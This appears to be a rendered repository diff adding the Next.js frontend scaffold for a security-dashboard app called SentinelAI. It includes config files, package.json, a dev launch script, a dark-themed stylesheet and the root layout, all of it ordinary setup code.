+ - [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial.
29
+
30
+ You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js) - your feedback and contributions are welcome!
31
+
32
+ ## Deploy on Vercel
33
+
34
+ The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js.
35
+
36
+ Check out our [Next.js deployment documentation](https://nextjs.org/docs/app/building-your-application/deploying) for more details.
frontend/components.json ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "$schema": "https://ui.shadcn.com/schema.json",
3
+ "style": "base-nova",
4
+ "rsc": true,
5
+ "tsx": true,
6
+ "tailwind": {
7
+ "config": "",
8
+ "css": "src/app/globals.css",
9
+ "baseColor": "neutral",
10
+ "cssVariables": true,
11
+ "prefix": ""
12
+ },
13
+ "iconLibrary": "lucide",
14
+ "rtl": false,
15
+ "aliases": {
16
+ "components": "@/components",
17
+ "utils": "@/lib/utils",
18
+ "ui": "@/components/ui",
19
+ "lib": "@/lib",
20
+ "hooks": "@/hooks"
21
+ },
22
+ "menuColor": "default",
23
+ "menuAccent": "subtle",
24
+ "registries": {}
25
+ }
frontend/eslint.config.mjs ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
import { dirname } from "path";
import { fileURLToPath } from "url";
import { FlatCompat } from "@eslint/eslintrc";

// FlatCompat bridges the legacy "extends"-style Next.js presets into the
// ESLint 9 flat-config format, anchored at this file's directory.
const compat = new FlatCompat({
  baseDirectory: dirname(fileURLToPath(import.meta.url)),
});

// Next.js presets first, then ignore patterns for generated/vendored output.
export default [
  ...compat.extends("next/core-web-vitals", "next/typescript"),
  {
    ignores: [
      "node_modules/**",
      ".next/**",
      "out/**",
      "build/**",
      "next-env.d.ts",
    ],
  },
];
frontend/next.config.ts ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import type { NextConfig } from "next";
2
+ import path from "path";
3
+
4
+ const nextConfig: NextConfig = {
5
+ // Keeps output file tracing anchored to this app when multiple lockfiles exist on the machine.
6
+ outputFileTracingRoot: path.join(process.cwd()),
7
+ // ESLint 9 + eslint-config-next can throw "Components.detect is not a function" for react plugin; run `npm run lint` locally.
8
+ eslint: {
9
+ ignoreDuringBuilds: true,
10
+ },
11
+ };
12
+
13
+ export default nextConfig;
frontend/package-lock.json ADDED
The diff for this file is too large to render. See raw diff
 
frontend/package.json ADDED
@@ -0,0 +1,40 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "name": "frontend",
3
+ "version": "0.1.0",
4
+ "private": true,
5
+ "engines": {
6
+ "node": ">=20.0.0 <25.0.0"
7
+ },
8
+ "scripts": {
9
+ "dev": "next dev",
10
+ "dev:22": "bash ./run-dev.sh",
11
+ "build": "next build",
12
+ "start": "next start",
13
+ "lint": "eslint"
14
+ },
15
+ "dependencies": {
16
+ "@base-ui/react": "^1.4.1",
17
+ "class-variance-authority": "^0.7.1",
18
+ "clsx": "^2.1.1",
19
+ "framer-motion": "^12.38.0",
20
+ "lucide-react": "^1.14.0",
21
+ "next": "15.5.18",
22
+ "react": "19.1.0",
23
+ "react-dom": "19.1.0",
24
+ "recharts": "^3.8.1",
25
+ "shadcn": "^4.7.0",
26
+ "tailwind-merge": "^3.5.0",
27
+ "tw-animate-css": "^1.4.0"
28
+ },
29
+ "devDependencies": {
30
+ "@eslint/eslintrc": "^3",
31
+ "@tailwindcss/postcss": "^4",
32
+ "@types/node": "^20",
33
+ "@types/react": "^19",
34
+ "@types/react-dom": "^19",
35
+ "eslint": "^9",
36
+ "eslint-config-next": "15.5.18",
37
+ "tailwindcss": "^4",
38
+ "typescript": "^5"
39
+ }
40
+ }
frontend/postcss.config.mjs ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
/**
 * PostCSS pipeline: Tailwind CSS v4 performs all transforms via its
 * dedicated PostCSS plugin — no autoprefixer entry is needed.
 */
const config = {
  plugins: ["@tailwindcss/postcss"],
};

export default config;
frontend/public/file.svg ADDED
frontend/public/globe.svg ADDED
frontend/public/next.svg ADDED
frontend/public/vercel.svg ADDED
frontend/public/window.svg ADDED
frontend/run-dev.sh ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
#!/usr/bin/env bash
# Next.js 15 + Node 24 breaks semver in `next dev`. Use Homebrew Node 22 for this project.
set -euo pipefail
# Always run relative to the frontend directory, wherever the script is invoked from.
cd "$(dirname "$0")"
# Prefer a Homebrew node@22 install: Apple Silicon prefix first, then Intel.
# If neither exists, fall through and use whatever `node` is already on PATH.
for prefix in /opt/homebrew/opt/node@22 /usr/local/opt/node@22; do
  if [[ -x "$prefix/bin/node" ]]; then
    export PATH="$prefix/bin:$PATH"
    break
  fi
done
echo "Node: $(command -v node) ($(node -v))"
# Default the API target to the local backend unless the caller overrides it.
export NEXT_PUBLIC_API_URL="${NEXT_PUBLIC_API_URL:-http://127.0.0.1:8000}"
exec npm run dev
frontend/src/app/favicon.ico ADDED
frontend/src/app/globals.css ADDED
@@ -0,0 +1,182 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
@import "tailwindcss";
@import "tw-animate-css";
@import "shadcn/tailwind.css";

/* Scope the `dark:` variant to descendants of an element carrying `.dark`. */
@custom-variant dark (&:is(.dark *));

/* Bridge CSS custom properties into Tailwind theme tokens.
   NOTE(review): --font-sans maps to itself and --font-geist-sans (set by
   layout.tsx) is only used for mono/heading indirectly — confirm the sans
   font variable wiring is intentional. */
@theme inline {
  --color-background: var(--background);
  --color-foreground: var(--foreground);
  --font-sans: var(--font-sans);
  --font-mono: var(--font-geist-mono);
  --font-heading: var(--font-sans);
  --color-sidebar-ring: var(--sidebar-ring);
  --color-sidebar-border: var(--sidebar-border);
  --color-sidebar-accent-foreground: var(--sidebar-accent-foreground);
  --color-sidebar-accent: var(--sidebar-accent);
  --color-sidebar-primary-foreground: var(--sidebar-primary-foreground);
  --color-sidebar-primary: var(--sidebar-primary);
  --color-sidebar-foreground: var(--sidebar-foreground);
  --color-sidebar: var(--sidebar);
  --color-chart-5: var(--chart-5);
  --color-chart-4: var(--chart-4);
  --color-chart-3: var(--chart-3);
  --color-chart-2: var(--chart-2);
  --color-chart-1: var(--chart-1);
  --color-ring: var(--ring);
  --color-input: var(--input);
  --color-border: var(--border);
  --color-destructive: var(--destructive);
  --color-accent-foreground: var(--accent-foreground);
  --color-accent: var(--accent);
  --color-muted-foreground: var(--muted-foreground);
  --color-muted: var(--muted);
  --color-secondary-foreground: var(--secondary-foreground);
  --color-secondary: var(--secondary);
  --color-primary-foreground: var(--primary-foreground);
  --color-primary: var(--primary);
  --color-popover-foreground: var(--popover-foreground);
  --color-popover: var(--popover);
  --color-card-foreground: var(--card-foreground);
  --color-card: var(--card);
  /* Radius scale derived from a single --radius token. */
  --radius-sm: calc(var(--radius) * 0.6);
  --radius-md: calc(var(--radius) * 0.8);
  --radius-lg: var(--radius);
  --radius-xl: calc(var(--radius) * 1.4);
  --radius-2xl: calc(var(--radius) * 1.8);
  --radius-3xl: calc(var(--radius) * 2.2);
  --radius-4xl: calc(var(--radius) * 2.6);
}

/* Dark cyber palette defined in OKLCH; :root carries the only theme —
   the UI is dark-only (see .dark below). */
:root {
  --background: oklch(0.12 0.02 250);
  --foreground: oklch(0.96 0.02 200);
  --card: oklch(0.16 0.03 250);
  --card-foreground: oklch(0.96 0.02 200);
  --popover: oklch(0.16 0.03 250);
  --popover-foreground: oklch(0.96 0.02 200);
  --primary: oklch(0.78 0.16 195);
  --primary-foreground: oklch(0.12 0.02 250);
  --secondary: oklch(0.22 0.04 260);
  --secondary-foreground: oklch(0.95 0.02 200);
  --muted: oklch(0.22 0.03 260);
  --muted-foreground: oklch(0.72 0.03 220);
  --accent: oklch(0.72 0.18 150);
  --accent-foreground: oklch(0.12 0.02 250);
  --destructive: oklch(0.62 0.24 25);
  --border: oklch(0.35 0.06 250 / 0.35);
  --input: oklch(0.35 0.06 250 / 0.45);
  --ring: oklch(0.78 0.16 195);
  --chart-1: oklch(0.72 0.18 195);
  --chart-2: oklch(0.68 0.2 150);
  --chart-3: oklch(0.7 0.22 310);
  --chart-4: oklch(0.75 0.12 95);
  --chart-5: oklch(0.6 0.18 25);
  --radius: 0.75rem;
  --sidebar: oklch(0.14 0.03 250);
  --sidebar-foreground: oklch(0.96 0.02 200);
  --sidebar-primary: oklch(0.78 0.16 195);
  --sidebar-primary-foreground: oklch(0.12 0.02 250);
  --sidebar-accent: oklch(0.22 0.04 260);
  --sidebar-accent-foreground: oklch(0.96 0.02 200);
  --sidebar-border: oklch(0.35 0.06 250 / 0.35);
  --sidebar-ring: oklch(0.78 0.16 195);
}

/* Only flips the UA color-scheme (scrollbars, form controls); tokens above apply everywhere. */
.dark {
  color-scheme: dark;
}

@layer base {
  * {
    @apply border-border outline-ring/50;
  }
  body {
    @apply bg-background text-foreground antialiased;
    /* Layered ambient glows over a vertical dark gradient. */
    background-image:
      radial-gradient(ellipse 120% 80% at 50% -20%, oklch(0.35 0.12 250 / 0.35), transparent),
      radial-gradient(ellipse 80% 50% at 100% 0%, oklch(0.4 0.14 195 / 0.2), transparent),
      linear-gradient(180deg, oklch(0.1 0.02 250) 0%, oklch(0.08 0.02 260) 100%);
    min-height: 100vh;
  }
  html {
    @apply font-sans;
  }
}

/* Frosted card used by dashboard panels. */
.glass-panel {
  @apply rounded-2xl border border-primary/20 bg-card/40 backdrop-blur-xl shadow-[0_0_40px_-12px_oklch(0.7_0.15_195_/_0.45)];
}

/* CRT-style scanline overlay; host element must be position:relative. */
.scanline::after {
  content: "";
  pointer-events: none;
  position: absolute;
  inset: 0;
  background: linear-gradient(
    transparent 0%,
    oklch(0.85 0.12 195 / 0.04) 50%,
    transparent 100%
  );
  background-size: 100% 8px;
  animation: scan 6s linear infinite;
  opacity: 0.35;
}

@keyframes scan {
  from {
    background-position: 0 0;
  }
  to {
    background-position: 0 100%;
  }
}

@keyframes pulse-glow {
  0%,
  100% {
    box-shadow: 0 0 12px oklch(0.72 0.14 195 / 0.25);
  }
  50% {
    box-shadow: 0 0 28px oklch(0.75 0.16 195 / 0.55);
  }
}

@keyframes severity-pulse {
  0%,
  100% {
    opacity: 1;
  }
  50% {
    opacity: 0.65;
  }
}

@keyframes terminal-blink {
  0%,
  100% {
    opacity: 1;
  }
  50% {
    opacity: 0;
  }
}

/* Ambient glow for highlighted panels. */
.glow-panel {
  animation: pulse-glow 3.5s ease-in-out infinite;
}

/* Attention pulse for critical-severity rows. */
.severity-pulse-critical {
  animation: severity-pulse 1.2s ease-in-out infinite;
}

/* Inset red outline for "hot" threat-feed rows. */
.threat-row-hot {
  box-shadow: inset 0 0 0 1px oklch(0.65 0.2 25 / 0.35);
}

/* Blinking block cursor appended after terminal-style text. */
.cyber-cursor::after {
  content: "▍";
  margin-left: 2px;
  animation: terminal-blink 1s step-end infinite;
  color: oklch(0.78 0.14 195);
}
frontend/src/app/layout.tsx ADDED
@@ -0,0 +1,33 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
import type { Metadata } from "next";
import { Geist, Geist_Mono } from "next/font/google";
import "./globals.css";

// Self-hosted Geist fonts exposed as CSS custom properties; globals.css
// maps them into the Tailwind theme.
const geistSans = Geist({
  variable: "--font-geist-sans",
  subsets: ["latin"],
});

const geistMono = Geist_Mono({
  variable: "--font-geist-mono",
  subsets: ["latin"],
});

// Default <head> metadata applied to every route.
export const metadata: Metadata = {
  title: "SentinelAI — Autonomous AI SOC",
  description:
    "Multi-agent security operations center with live threat correlation, AMD ROCm-ready inference, and enterprise-grade response orchestration.",
};

/** Root layout: hard-codes the dark theme class and attaches font variables. */
export default function RootLayout({
  children,
}: Readonly<{
  children: React.ReactNode;
}>) {
  return (
    // `dark` is always on — the app ships a single dark theme (see globals.css).
    <html lang="en" className="dark">
      <body className={`${geistSans.variable} ${geistMono.variable} antialiased`}>
        {children}
      </body>
    </html>
  );
}